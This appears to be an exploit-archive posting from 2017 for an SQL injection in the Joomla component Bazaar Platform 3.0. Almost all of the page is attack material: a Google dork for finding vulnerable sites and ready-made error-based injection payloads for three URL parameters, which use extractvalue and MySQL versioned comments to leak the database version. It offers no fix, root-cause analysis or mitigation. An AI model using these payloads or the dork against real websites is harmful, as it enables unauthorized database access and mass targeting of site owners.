Home / exploitsPDF  

Joomla Bazaar Platform 3.0 SQL Injection

Posted on 22 February 2017

# # # # # # Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection # Google Dork: inurl:index.php?option=com_bazaar # Date: 18.02.2017 # Vendor Homepage: http://matamko.com/ # Software Buy: http://matamko.com/products/bazaar/live-demo # Demo: http://matamko.com/products/bazaar/live-demo # Version: 3.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL] # 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL] # 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL] # 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- - # Etc... # # # # #

 

TOP